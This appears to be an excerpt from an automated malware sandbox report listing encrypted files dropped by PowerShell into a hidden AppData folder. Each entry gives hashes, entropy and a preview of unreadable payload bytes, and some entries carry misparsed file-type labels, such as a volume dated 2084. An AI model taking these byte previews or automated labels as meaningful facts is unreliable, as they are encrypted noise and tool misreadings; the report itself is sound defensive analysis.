Preview:	B...E.)...r...!x..............k.J\AA.e....<....tN....F.).....Y/...E..b...d2.....^PP..8_.u.\|..P.s.O....o.....6D..%/\.T...JC{.&.w.....on.d<.#..>E...!.j.IO!5...x#i S......z..N{.b.6Ts...U.K..9..]........,`....,......9..d.D\|..FS..N.u....).-Q.f.0..v.l..1.P.a..M?...2..&C.ip..1...\..E..9.o...G.....b....2#.$..e..{,..+..m.....!a..Y..I.......Q..L.('...ye...4..,....\|...g...\c...8......n....Q.5...9Ck1E....-;....3`....w..."d.&......>.f?9..@.h.....8...;.Dl.}..bZ....D{...D"6......%.....(.s......f.;.0.>'R..........^...l.....WX...m!.T.ey..i...;...t.. }?..<.=...q..z..b...U...;.H..,e.. ..((.U..z.ll..~....P(. ......4..e..9z....r..........k..(.aF..M.../....eL....0,@t2.X....,H.."..c%....].A.Zcc...`!.r.....5....C..+...y..Jg.....<.....\|T0DR.O./z....f...e.(.k.$x.J...B..Y...lA.....k.&A..2T..P-.6.!...2.......x...`_..t.k.p.(....5.. ...S..{4...F.5....9a2....x$nD......>..l6H...3_..4........PW.^..1\dN.Nmj.+.).}.....#U.C...<[.o.&._..G..=4.f.na6.'N... >..1.....L..E.)..bE..

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ncVxMtIObB.PdzGebAKXotQ Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	SysEx File - Kawai
Category:	dropped
Size (bytes):	130330
Entropy (8bit):	7.998664932749766
Encrypted:	true
SSDEEP:	3072:YV/qaRjDZyO1A6H/C1JTBhn5hc5cXbxUSyB+WiIkBjHX:q/q6/Zy6AK6HdOyXUKT
MD5:	B5DDF65C2B884F48E55CD9235E14ED80
SHA1:	5905D73C9917470F821C9054F3208B6E63856B20
SHA-256:	1AAC37D8F8AC2DE49F0E16AED81EEF116B7B8996D762711F537B6BBF56E0A11A
SHA-512:	EDAAAFEA5F5DA04B4E65156E5E86EB8F443A4306DFB44093A61E59CDF680800611786F2E46BE3876E54C5F79F61820CAA77108AA447D33704C322854A1BBFEF2
Malicious:	true
Reputation:	unknown
Preview:	.@.!..<Ap?......R...]A....z!u$.ik.o...l.P(..my%........... ...es.(..Y".D5;....i1.]..pM...5/,.V../..M..v.]..PX.........TE_..Po.......k..O..!!......N..cEZ..Ss......vSK .).]g.$>zoP.}W...P..Vc9......#.T..$....6..."..D...:Q......&.K.z.o2=o....C....K,Of...[^..p.....}D4..4.P`[oF......7..`;..0zL.C......fY.2..Q\..O.T......}......`"..E.y.~...'.....n.c1....._....4./...A@76.<....{4.T/..T6.w..........-I+.7..u.c.]...$.hN9.yi.......]..E(4.b.....Ek.a.}..d0.. ...s.a.G.SQ..>..$....ye.....v..p...6....Z)8.....2mu..8...1..A.....W.H../.:O-.i(^.D5=...K.X.s...x.N..^..c....K...mj..{b.I......&.!.....?[.i.....b!.....7.E+R9.D....tK[.OjK...p* ...(....]z...b.."x.h.3.3.{S>...GmkF\|.....Z\.D>.3M.?.c..rU$....x.f..FH....z'.Zv{=6.ai....\|...N....tV.G..=.5..]...KO.j......>T...... ..` $o.6!.........Y..7....y.>J.1..U..F..hl.?Kv'...i#.h..Ut;....>.......c3.O...`r...P..U(..}..f.H..V..>!.........[.^.....;NW#nf'g.....b....<'..iB6.....o......H..j>.0.{c..,.....c\0}+e..._[)...N...f

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\nfwJXpRqDGBzkj.UcvFBZNVaOQMiIL Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	110999
Entropy (8bit):	7.998461534256443
Encrypted:	true
SSDEEP:	3072:y6yHQ6fRDauCZl42Pluqehffb4sZUi5Yc:y6a5DbC1lbeXksZUiac
MD5:	699B44E61B071132E0AAB75E089B9823
SHA1:	BBD5ED08AE198B30732C0BA81E3CA754E69D0ADA
SHA-256:	18D8F7145917BA5ADCB9D35148925D53D4951CB07D664D5E074ED8964963BA52
SHA-512:	26A299D5DE0884BA525E66349D7448A9D3248AEC85153D2431E61B86684C3ABD8E81934E9DB899EAF8F6B08803FBB77711822042142E8B16E69EFFCB965E2C1F
Malicious:	true
Reputation:	unknown
Preview:	...w.v..N.....0..u.zh.9..A.m..:o.Zo'4T.G.5.qy..0....-..=...[.>.V2.8.}. -w.2#...Y.=.h.U...#}......G...[fT..j.u..on..[..%{!...O..:0..E...6.e.CS.s%.m}[K.~j.4......./{.4..U.uY7).'- d...>.-_.uckc=a.I#w....'B.>GA....n."..@...Q.......us.:...Y...h.k..>......V5..#q....... .'......B..... "fV..hT6uj.`....Vs..ZgPm!R.....#...oU.T?J.._".A.8e...v.......xa.U.R.{........7....6..?'............}d....u$&..w1.....%;..v...uQ......%.%.i....$....-.Z..U{RU...m.Y.!.... .b.\ ..Y...\.H...AjH..Gdx'7tovb.`...4.`y.S.c......P.,....f..R..-J....D..;m..~q.@..M......g......f]..2AF.{. ....H.@p.y.....;.9.[~ ..u...U....P.K.X\|4.....$d6.^p.C.e.23.i#$?..D.....2&.<u.Q6..(.k.Y..$.....k..+.}>u....o.o_.p&.3m$I.[[.\|..Ap]..5.G....1Ag2/`.D"...F...i>U.Dq...)k(/.....{.(...n.N.....e.`Xy..U=.7XX.b.../D..{".BG"Y.{:..R*3f.)...X.~...._..v..>.6...0....8.<..P.#>.-`7.%.z.Kg...K....=..$..O#..&.....EvK....J[(....K.WY.<......%....B>.U.=e.4..D28pv....Z..d6..0$...V.C.Y...ys....\...M5.6..x6.w..

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\nvMkfYadeliTKF.RSNBDVQdTKywZqeFJov Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	58537
Entropy (8bit):	7.9969202991994015
Encrypted:	true
SSDEEP:	1536:OytIs4LZ+qnGkyJQ20Xqpu+APSVGpoJrC:Oq4t+qnGZb0XqpeqRJrC
MD5:	C49693D58359BDD64437C7D953710EE3
SHA1:	98E8ED57AEB56533A81B25C68CCB8E772A6AA87A
SHA-256:	A63455E493BB73D1733E71793D350C389298701049F7EEE07FC7F5EEA1B90512
SHA-512:	F2E8E9A1A1E6910BDAD38F656FF1CAEA26F6F2EEDDB8789296914B2162EC593F04C3A38F7D657B982B9288E00DF8188BDE2DE2755009310E1DBAE38A4685E02E
Malicious:	true
Reputation:	unknown
Preview:	..../...l{a6/.C.t.%..5..%...{....i. ..P.L...@....9.....X.".7....@.......s.N.f.B.n....9o.-...!3.!..B%1H......6.HGe...].r;%.r.....EUE..=Ra....@....%.Q9......iq]}.]....(.e..T......#..F.0.OU]L$...U0.jg@...H'.\|.Xl..j.A.)....0.....?.S]...p..Q........xQ.r..aQ.z.Q[$U=......T....FB.+'...I+4..(j-.....l.......m.....NzAa....LL..^.S...#Uq..L.....Z..~K.J`.....Q5..?.@bh$%.U.S.X9.@./.L.z(.u.....b.m..8.Y\|?x.0.\K..L.7...:b.T'.>.U.F..H.2..E.......F.m+{......T.:..S.~........Bb....L..G...\.6i.K........~...{sA6.BB..K7.<.Y.v...&.....L<5..c..f..b...(.......LxT..p.....u.5,Y>O.i.....Sha.m...c..jo...j.B.Xx.vy.k~.W..y.=.~P.s..q..%.[...............c....>..`.?...SO..L.1@~.L.m\..$O..?t...yU.t..m....6..S2,.{.....7..c.\|..>K.y./c....W..n].A..@....=....A.L.T..p.!.........w...H.4.".r....X. .......<..eh."k\|...6M...!..AF.p.e.-..j.Fg...lc.G..qT)..3....O .\|-U>..E.8..9.g.).eG...I.m..^l<...6...(,c...b.\..).......n....c...w...e.`..}.-...5.4.>6.y[.\|....<...x.s0.2 .&.....H..PiJ@

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\nxkFyrmsBzS.YBjUZGFSMVPslXNyebx Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	130356
Entropy (8bit):	7.998714905194684
Encrypted:	true
SSDEEP:	3072:62zwWHYpiCjKbvut56Ho3SBzdUz/YUuxloS:7/HYpRjKitco3wdUz/YUun
MD5:	F318D4F9E87106465059953C77F902F3
SHA1:	0EB0D7B7CA7D08583B710CFB119E9D480F66BBF9
SHA-256:	F23C50FD7C1B8782F42736A32577A39CBFB43045C8FB0DEDCCD05047449D6687
SHA-512:	D4F4E07382F68B62A6FBD1096858E921FA0C2F6CBAB5CABC47BBF93A2D62F37EC00B820679DC86835CF0E4A5F327E680D537053F21F724B02915AAC1C22C05F6
Malicious:	true
Reputation:	unknown
Preview:	w.n.....y@..T..)..w....h.h..U...M..L.g....k.1V....UQ...2.......+....GO...r.'[....W'ECa/<.......r.+....E..<.a.2...........Mv..<.y.zO.....Q.b./>.:7.........E..q.]......._S.4....78j....q`G...CL[..f....G1..2l.."....-l..}.0.\e...@... ..W"......;s..5.-...sp\|5..^}++.....u.......p.}..g....."7..g...0..Z..".2...... ....;...>uR.=...?..#4z.O.g...\4.....('..=.O.....g..i.b(.7BHxW.................g....H}.m.......c?0..n...ki."[.r...W+.R.p.%.Kc....x'...hL.8........C.X...N..I.?SZj.6......9jPb_,..,x.Z.9.9V5R.Z...z..VR...MxU..-........+yv.=.....L....lK.a.j..fh....\|....5vW.....G..G8Xs..;....\|/H.\|.Fi#X..L........!g..c.J...\|.(T.TeY..y9...k77@...&~........Z.=Aq............W.-..\|u?...<'.........~P&.......KRg,8....*#."h.4.7...m..;bigg..l..9}mE1.uct.-.e..7..y}.R[.::R\.x....F...ey-.....,Gj..L..p..?;("%xE....C...#.O.V.....&e.:.YS..<W.._x..3..,(...F.9...3Q...~...D(.G[M.X.....8dz...Is.!?.C.y.....X.@.i$...@....+......hq..eO.E..14$b.....e...\|...~.0...z...+;......ru.....

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\oIDuEdeHBFW.XnbHyjckTvr Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	186737
Entropy (8bit):	7.999025984209987
Encrypted:	true
SSDEEP:	3072:nPb2nDh4257hX4c+XvW87Q0viRzTAxkIF2AgcRn3t3Bcsyy51PmrI1eEoPkM:Pg425NXwXQ0UzPIYfcRd3BzyyHVIEA
MD5:	24A60E8588FC303181A4510E984A7E52
SHA1:	DB385507E31A12B4E74C95496960905E89FAF9B3
SHA-256:	E49FFA76242C084525262F5C655AF18C8FF26168DDD4DCF50FC7DF58FB1603AB
SHA-512:	577332CE97DB5CB979935CA7F2A77725561AFA18F7D50D80CC88FE4AC5EF6FF922DBD6FAD0A756C74A5217EA64438D3FF9E009047563B0DE8664E91EAC182F89
Malicious:	true
Reputation:	unknown
Preview:	...W.......\|..OE.{8(s.5.Bh..j.....\#..'xjV..3..^..f...h..U9..l..+i....z.w.kNj.7...h.1#.!#0n.]..[.A..f.V.9=.=........].....Ip......)..B.5.....a......UV.7...k.#.P.k.9....6..,\Y....DwF..R) P..4...{N./.b.^..-.$.....%.....9',(_.,?`h.c.{s...W.p}--(...~R.@L.6.....ps92..._..8;......y}C_...#..=^[.e........,..b...<..Tt..."0.6."Ugx.........3&..~ ...k.W.y...."f.S....!7.3....j&....!....6.939..xT\.[.h...Nt..^...9..xDU....K..M..`....}...Y2Jc.....J...@.m.........x.X..."H0....\|M!.`.yV...$..2.......C6.=$......NG..9U#.".C\|.V........."q.^my..[L..]......,#..4...Br..N2...o1....q.;..\|.q.....o..X...&..Iz.\fA.d.Q....h7..3.......0..,h......... ..GNRp.e}]:.0\.w...w....+.y....Q.r.S..V..g..Q6/..L:B.I9]?.r[....n....k..?.k.p.i.....9.8......G[..E2..oxQ.1..K}.+.)Q..\|..W.^E<#K.~$...Ni5\|....f..z.B1W$s.=......G$.'..Z...r..7~..R...pZ....6.C...^r7.Q.%.q;....t&...8.-..w.=\|........v...U.4..+\|i......0.b..}..lc...-hl*...~,q...p.5...NWX\..J;..-O.....7..?6.#....-..0....BN.8I..Z

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\oYUphfqSePQmvk.TZscjmSIDfXoqh Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	151675
Entropy (8bit):	7.999095175796968
Encrypted:	true
SSDEEP:	3072:M0mW/QlQzF//AEJbEzzc8VXKUIbX5WXkqZQzVtVRnplMRJxr:w3QxoEND8pNkX5WUqZiVPRn0RJxr
MD5:	4935B82F357E610864AB18E6F276954F
SHA1:	ADEBC67CE5B15987BACCC4B7308ED36D9A5F4153
SHA-256:	5741429444449F67F42CEE95CA7C4C85917480937C97512BA426445E17FA77F5
SHA-512:	2883BD5A4882AB50839BC3991E083362F97C7514DF668823F60A4EF4302961EA8B3F6376920211D44895A769D644965387314975D30FD3DC0A6494DC956306D2
Malicious:	true
Reputation:	unknown
Preview:	c.[D...v..Io.7j..n.../....`...T..y.X...L....'.<X..}x.4.EV..'.c....R....-A.;...p....RE....u$...r...?x.t...B..<\|...bx.>P...G.KW.i..i..]`.Q..j.......(.x..B..-=.&. i.l..n.&.5._.......XE...?uN...WD.v;.....R........" 3[..1.TK ....u......9....\.7!}.7...a......?A..nlU.}....T"....1...._"E....CY....X...............m....L..Yz2......Y...y.1S.~3....3I.f..........H......T...Y.jl)........&.a.W...E`.>>..>H../.S.Y.7../...d.7?.K...R$.".B.....8`/hHT8..re.[..YS.....W./.6..,/T.......R.lve.m....XC.ms..8<...gB..QM...E."N..Z!......M.+..4Z..".r_..F...J%..v.....k.....w....q>..O.Y..T...Q'.Y..8].&..]....=..\..I.'.0._..c......2r....P.....#.xA.a..,..X.CG...p..)f.2.5..w.{H.{.a...A.^.......E...u.seg.\.....$.\Y....#.Hs.p.....".U...P?n...G.Q..9Q.+.}<...oB.h..6...A........(.^..........s.+.%*.(...".?P-~.....z....>..cn^...}z...H._5...X7.....v.u... E.2.">..f1..#..m.x..;...a=ET.~...J..W...iX...CR:.~J..K.........W...,.j..k.}......?3r..?`.7S.Y...:.y.qh.F:.''.S....g..2..2....

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\oanLetbTJqWrs.iLASgomVsKGnWBCN Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	129874
Entropy (8bit):	7.99864624079161
Encrypted:	true
SSDEEP:	3072:4BT+JXFpXQZp+i8NzeEea4OopscehaTIHpxTrfBZZuxnT7Asd:Y+JXLXS8N6E9LHGIHpxTjZuxnT7xd
MD5:	1F8478ED360ACB708AF715C5D17F12A0
SHA1:	C51CB083C72B5DF275666CC04580C08BE499A8FF
SHA-256:	7C45DC30E1D306B43A62EB632F2B137A334D9E74F5FA9A7A1A97FBC3ECA55980
SHA-512:	B68506946469B773702852501589E528D45E42C6AB46AEDDE12332DA9B2B9D07D3916A2330DD7B8F562939888BC8BB377E5E5E52C4BBD170F2B6CB222911236C
Malicious:	true
Reputation:	unknown
Preview:	.J.\..Z..x.w.k.K.~}...t...s.qv..cf.=DW.8...P.5.'S....TV/.?h4.1.5..(..:&....U#...Ku......M.Z.r..g..F-u.._....=...Zk.9Y4q.W.Z.....>........wI....K.\.....{..._&.t.Hb.[.W...L..m.IA...R....^..(.#....G....$.N+.<".....!z...0.X..z)........}9z.Uv.".U.....o#.\.X.Xj.%@y.o.$.P....jt..zk....c...._d..../6"imf..x.o...).2..N...=......:=s....ZQy..}..5...U.....(_.....G...%..9..\|.b..d\...m.UfU..h`y..#b....w.bN`......{...-UOe....E#...'...8..B.V.....'=.../o...t....).......s.x.MJ..F%~.Lm.....`..R.-.....%F.....'g..kE....N.M....&.z..<>..&&t.zAX9B..gPLj#...AAq.+vf8.w..n3.]9.b.A...7....-......... ..0..4..1(..-.e.!...b...Yb..'^2 j..;..5?..A.m.DO.KD.F!.....G..mX...m.a.f.I..X.u...$.6%=.l.p.....x.}...L..[J..<..Zj\|..SG.v...`u.....<....D...p.0...yWjB`q6...{..A.5'[..d_.Y.yl{...WH.....".QO.AZ..o...y....... ...r.+.r9.M.B~.....b..N....*<1y..i..}.uy+..,.;r.Nso.B...;..R..P.59\|.S.$.......G....../B..f&.de<...)..K.m. .x".W.9....sz...+=..........!6....Y.......>..{..A ..k.9..m..Qt

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\olZOXTePaAngE.JIhlosSFNxGB Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	178005
Entropy (8bit):	7.999023473141009
Encrypted:	true
SSDEEP:	3072:UIE9l2ufcJLAb5zuoero2iEMwYlniKwKiolQ0MgdzAWPOJiT:FE9l2uESb8oe8/EiliKw9T0CiT
MD5:	279243C29293809C24F7C593827C052C
SHA1:	F8A3AF6487515B1BBEF85BA92406A647569E60CC
SHA-256:	3BE4F702F9B68702A2D05C49B04962545713FD66A64043FC41457D352A25F033
SHA-512:	F9BF92B0AC334A518AB1886F3D21BF1984ED6093D4ABAFA6BBD344CDEE72D81264794C99964078CCF6D45CBC0333BEA304243EDE0E4A24DB3FF551EE2E4154D4
Malicious:	true
Reputation:	unknown
Preview:	.Dq~.).SP{d.S.2..QP........}...i.2p.qp....2.9..8.w..w.......e.fm.?w.=>.\..}...]..iq}...Au.].......)...h3..:.K.....m...M....M.6.....4....I.E.....J..."......3...9..}..?.....>..XBa..G......!D.w.H+%....0.....3w.~..1....X.Q......=.x3DU.4..H..Tu;..iE.X.>.c..........:I...@F.y...TT.d.]7....av.e...v.i[.H..U:,[.IL..u]k"..W.Y....$L....8L ..q...).ss.DT....vt/.786....<.K....0.A..............._.....t6u...B.)..2.~.0x..Ee.{..lUb.....".(...{\|.b....W.h.bV...V/\|M......t.q"s.5..Nk..x..Q;.GP.`...x..p...S~.T..:,./8....OC.JR.<a6Bi.>.,nqP.V.>G.Fg...(..Ot.X........ V.%a..=./......y}..TN.'....@.5..k.a"bbE j.\...h..{p..2......-\.T.~..Z.?..^Yw.R.T.<9...9..#{.31=q.\y`..E.0.......K.#.y+E.D60...!...G...j...eR.4.t.LM..M..@......3;...-..m\..q..I.f..O.-.....:0.....[.Q.%./:{..U.\|.. .k1.aO..u".-....".^..)I[.<#.uQ.j.v...9.i>..dA....6.qgZ..".$+7x#d.YdW\|%...D_y...e.>.L.y[.j"..=......<f...`q..A>....^9T....m..V<.<1..Z4_.Q-5.c..+e.Kv..7.=.3.t.C#..SZb.)....+.{f...A.=...a+.......U..D"..

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\pJaSKcNVqCmXIy.RHZsaACTSmF Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	52082
Entropy (8bit):	7.9963201652304825
Encrypted:	true
SSDEEP:	768:FIHKxSxL0s2U1ImE/S7E67bUwXL6JAO9K2sS/kA0+SioPYXXGVZQsaSYb:Wx0sKGf7bzXL6JAr2h/kXzPn7+
MD5:	6DE6968A949A0727959A97AB55A01A90
SHA1:	EABE48E3EAD47B9CECE8583DC72DB9A7862BA60C
SHA-256:	6F9637BFCC45AF296F4FF886A9683122BE72A96296292A1B6E5E69F48EB8B1EF
SHA-512:	7844C4365F7C6DA64636EEAD399388261FEFE9718191455B2C3DF1436D803D78B84F3924568C1CD9ABDAFD47AC9937EFE16DBA9A5F82001491A43E31609FE071
Malicious:	true
Reputation:	unknown
Preview:	.mu.5[[B..xC..U...\-wB.H.6..vx...1......fX..d....[/.<...-9..z..daN.R=...?t..9N.....I"..y7te.n>.....l./y....Y..N...p.?....j\|k.5E..8..Qi..n.U..{Z...\.m........c.wf.;?.......'...#w}.Y..`..~.`..f...m./.....e\|........G..S..,mCC.6..7..N2...C.0...E..H..C..;`/Y.z/....3..a....P+..u..2x.g.....'A.Wu..3..uC....M......B.].l\.....t.p.Y.. ...N....C..[2..6Y..T.m....8H5....#...D...[7.....#U60.~..&u4b.....M...<;qm[+...;..$.x.r1.... ;CMA..&CA....?RpG5......}..P..h.aL...Z#....<..3.0\|........B..`'..dw.j.......Bh..q...I..#....>3..?OX.t....3.....Ie.......F.U0....){a....=s.....X..'.Z4.z-{9[k....}'.g.{xq........=.\|.F.......9..` 0.q..../.`..`....7]....i}q......[7F....FSR]..?%...f.:....z.....Xff}.....QxS8........A.ffc..h.N^4...RK.........<...i;.q..V...sY..FL.V.;.3.l....+{.y..X.5.....I..AjBX._.-.l.L^....:...UT..La.D.)`.f....8......FkH..n.,..N.7....Bh..H...C.P7z.c.t....[...z..N.;...D'D6..u...o.qH.s..J...vq..YG..g....;.>.....&...C...Y_..]..#.,-w.d.q......6fm.O.w....

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\pNxAuzKlPSsb.YawgmDuzNJcKdqPyBL Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	81899
Entropy (8bit):	7.997866362582158
Encrypted:	true
SSDEEP:	1536:32Sa0nPrQR4zoNnmCgG9C0hwrffqmBVEdA6K4LJS6SWjT8Wr/B6d+k9MXYQnzaB+:FBjRUYC59C0hwiPL3SQF6koeUB0RDFrB
MD5:	5EAB13D7773E31E710A86FCFA9210B07
SHA1:	08BFD1791662FDE6AA5975379093CFA5555CD910
SHA-256:	B90F9D6284773072D0948A6850E98AE98035999392F85966BA710798770C340B
SHA-512:	E603F76F59AE38DB892922992B61519876AFBBC2DB7D54A9A1C24E56C93442376DBE50F9B8019F019265E62DB20AD0C67C3F4F61C2D7CA15BF86513DC3E63ED9
Malicious:	true
Reputation:	unknown
Preview:	......N...Y..6.(....u....[.......\|.....M...)v-qqDa8.A..kAL5T.{.-}.%b.X..'.I?.2.h ...MlM..D.7..y.(^....m.aM..y.^...3.....ZW]...Y..0....`...R...T..sw...6...t......Ii...l!b4..;...cQ.h.....H.`p......4.sX...V..9...G_Q.Oh............w.;...........q.y....R...fO.H...39j#..X.....7Y..$J.:..$%..k.[...Hte....c.....H....k}.B.D..z.a4.&u.....]l..2...6#.....n"...A5...\|.h.U.-.......).sV......T.l..6:...5ZO.0s...#....G...l....@a{..lah}.d$..M....^2LMW..;.[..J...uR."....W..Um.5...//7q.,g..h=.<......j...3.oh....\=..w})..@.+F.XNe.....qNwE.)^o..Z/..5...Nc.g..P!....@..p..7i..^p..j..m.v0..(o.\....-Jt4^;............" z.t...`Cu...SH...2{....z.51.x.d.O@.1O.G..\|E.T.[.<...iZ^..@~... .o.N.\##4 7?.R;..%...j....U..a.h.j....E7\|....M.d....G.....H..k^.H..H..@........Q.^.k..&...W.G=(......]...H.7.6..}...Fq.....:f....".....f8.fN....3.0vS....e...7..n..j.....8..s..fr3..0....w.c.....-..]:.$js..R.\|..X../`.&......E8C....... ..J..t.0..B..W]}.....{.-..G... C....f}......<*.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\pQXTzPisLB.YdjTlwyLCtcMAvebi Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	168265
Entropy (8bit):	7.998895011354329
Encrypted:	true
SSDEEP:	3072:QhB3df/7pDzXQZZea9Dpx1Shq0iWrjOGkoKzcJLQAiFvhfHwkZ:QLNX7d+Zea9Dpx1xXWrjgoKELQAiFvhx
MD5:	FD84F5481E0135CF61C5CE1BEC46A453
SHA1:	180E01D3EC66C3C22B33AD387EF58F38DAF2A269
SHA-256:	59ACCC742A2413F9517B1B26DDBD7D8C75EB562D5F3DE35AB79CDA9A357A4D15
SHA-512:	7941758C29F21754A56DC2CCC2265EB4B90A56574D080E70405F2E5A273518213A292E6B18C57EEA866B0DC7EC074A79AC425EE07FDFE470A9D222F207A199EE
Malicious:	true
Reputation:	unknown
Preview:	.Y.7&.....rO.km.../...U.<{..uy7Md..)K._..j....d....y...b?....b;....D..$.U.Z.T....,.^.....Pq..D..M...X.OU...I...K.../;.!}u.k........6<C..~n...c6.B.m....]$...f"kS.%...Q2...3...4$F.<.&....`q.....So...3..~.E0g/..} c.,.N..].9...niC.#@..!l.....1.H^.q..B<..=.;DI......=....%.#E,..v....{a/...'....E..!.....R....FT.s$f.S).8...g..0...3T....(GA......MZ....%....f.l ~.......[)F.}/.bD...Ab.g.-.G.u.2.j.5.R..FE..7g.Z".[.=;.1...H.B.d.Bu,.9t....H.)GS..3-...1x...`..V$$.-...B..D.oS..h<1.(U.o...>...........[....?.$>...E.w.Fb..R.j.!.cK.....i-...../.r..r.y./`p..*...C.C.18..)u......)hq.W.O[...^.".6N.....Rz....2p..kq......7..{u.O4..i.d.N......}~.m.zAb.....>R...._+..}...Z6S.m....U...H.K.....4...b......Tsm.4P.w.0....!..mx\|...%u]...cY.Xs\|....>\|1...0>.A..F7..t.H7.ygI.7Cz.<.W:..^+.E....j......@...7....v..-.....u...._..^mr..)....'[hL$5$><".X..o...TiW.n.......N....\...!....h.E.z....Q...04.8I..7.Vq....H.f..%..B.J#.5..b...V.jYF31{.jo.y.O..].p....h.......sFI.U`...

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\pYVhZibRAN.sMvDmAGFcSlhzqQ Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Macintosh MFS data (locked) created: Wed Jun 28 18:40:26 2084, last backup: Tue Jul 1 11:58:28 2014, block size: -508797179, number of blocks: 13847, volume name: \313\360\032\014w\224\3462\026\206au\304\374\344\027\206>&xMhoi\0208\254}\272\346o\350~\313JP\033
Category:	dropped
Size (bytes):	130452
Entropy (8bit):	7.998738399243781
Encrypted:	true
SSDEEP:	3072:B5lA0InlfRYQqz7gK/dly+GIOa5A+aZwiWlQUdFWTeOld15BxZv6:B5irhRYN7gKlIsO+RDA5BX6
MD5:	86163700D631E12EBE8C06AAD9C3FD17
SHA1:	9FB1B31E4579C0ED11D1D105D09D7C3D7DE6C143
SHA-256:	EB8ACBE1743E2749200436BBA897296A0CFA5E69DD5F209FFA6FE99B29B5F0DF
SHA-512:	9E7C7B11DABD1C592544C3920B346A13C2268F9CB9B44C6E41DC286D22CA3F360B9964CEBEEC1192B3474A653F5B947302DCD01CF1F0E4BE03304E026E2AA74A
Malicious:	true
Reputation:	unknown
Preview:	..\`.v......."m.{.~=+.Os......yf$.Am.......?~ ...t........Q.$b.U..Ndu......Hm....;....E.R....X...P...P.5....._p..:.pa..5..O....at.@.h.C6m.D :i.y..N0c.opE8....:.\|_\|...S.d../.;.....D....#.)&b..5..S...T....@......&..(i.}.>eL...0.O... .?..(1uc..i.Ve.}....?G..<Y....X.c)Q.....i#..D.w.L..........Z..z}l-;J.......v.G...rj...i1X..3....I...-.4.\./.....&.cn......A{....K....c.5h..9...o..u#...R.;.....x.L..$e.8.".......MA(...\(1}...G!C...`..'.%...5...7..9...<...b...mrg...=...cG=.g.......#A/f#[..$`.&3..h..d9.3.s..b@.sct...>..hR.....y..8.].T..#..n.....NLX.yZ.C.T}O..k<.o......Q..Z(.3.6. .W.....i...x1VM/..t.e._.sH.,...........Q..9../...p........P.........5=L.#@..L.C..Ql....a..........oW.i.3.......Q.Q...~..=...!........I.9<.X..t.t.a0.6/P........7..\|< ....A..g2..VX)B].......'?.].....SB.Z..D.......#}wN.6....h.6.......9....k....\|.z...W.:.M"..\|D......:.>/.J.Sh...5./..]]`..m.6.o.v....~d.......d^....D...w4BU'....n.$..2v..QI.m..S...1Yk.sI!c...1w...9.-..m

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\pbYRUgCZwzexLB.iEPWMzIhptdSLfZR Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	168448
Entropy (8bit):	7.9988381048302895
Encrypted:	true
SSDEEP:	3072:Bd7KOhSxAvyzb5PLhFwUVYVF8ZTvmNc9q6zbXe+8eRssg8bwR+2:B1rcAvynJFuUVY34CxUxssb6
MD5:	38490EBEE52A60EC6DE3910958A53A46
SHA1:	1C7C291774D341FB663805685EAD2915CB0807D0
SHA-256:	9CA0D43C053981BD6F7E3F0F5E308CC31858BCC2EFC7DBE31E2AE0D76C4D3A45
SHA-512:	DADEF3D7FDFE65E8AA1CEC519C6D3ABEE61DFB7773F3A87F217466A8190E6770B2433603E6AC81FBBADD206A6A0C9710AE0FE608AB7BD7689EF7BD03143E4ADD
Malicious:	true
Reputation:	unknown
Preview:	......._.<o.=%.... ..z..y..>...$...2E.S..g3\|.......>....[(...(...^<..B.N..wb..^.L.u..^..p=.1>........Xr..s?i.9R..uE.y._"..u...c.\..{..H..iP.....b3{.2.D....Q........`.A.t...T...`r.%...w..8...#.{.&...\|9...N...Xb.@.xJ.6...~".f./...d..p....(...x.91...."..aW.....b...$P....Z...q..t..N!.R.......2v.....8.2.Oi...$.~4\|..D.X......w.8...SL2.....\..nV.....UMF.K 